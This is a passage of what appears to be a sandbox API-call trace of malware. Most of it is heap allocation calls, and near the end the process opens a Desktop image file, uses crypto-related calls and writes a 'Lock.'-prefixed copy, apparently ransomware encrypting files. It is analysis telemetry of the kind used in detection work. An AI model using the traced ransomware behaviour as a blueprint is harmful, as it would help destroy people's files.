(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0215.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0215.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0215.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0215.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0215.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0215.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0215.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0215.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0215.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0215.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0215.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0215.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0215.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0215.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0215.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0215.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.633] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0215.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0215.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0215.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69928 [0215.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.641] CryptDestroyHash (hHash=0xa87490) returned 1 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0215.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.642] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.642] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.642] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.642] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0215.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/ZsyajCuqv92xTr5whyk.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\zsyajcuqv92xtr5whyk.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0215.644] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.644] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0215.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0215.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0215.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0215.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0215.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0215.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.645] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0215.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0215.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0215.646] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.ZsyajCuqv92xTr5whyk.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.zsyajcuqv92xtr5whyk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0215.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0215.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0215.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0215.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0215.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0215.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0215.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0215.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0215.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0215.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0215.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0215.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0215.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0215.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5f020 [0215.652] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.652] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x21a2, lpOverlapped=0x0) returned 1 [0215.734] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0215.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0215.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a2) returned 0x2f24018 [0215.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f020 | out: hHeap=0x970000) returned 1 [0215.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0215.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0215.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0215.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0215.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a2) returned 0x2f261c8 [0215.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0215.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0215.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0215.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a2) returned 0x2f24018 [0215.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0215.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0215.740] HeapFree (in: 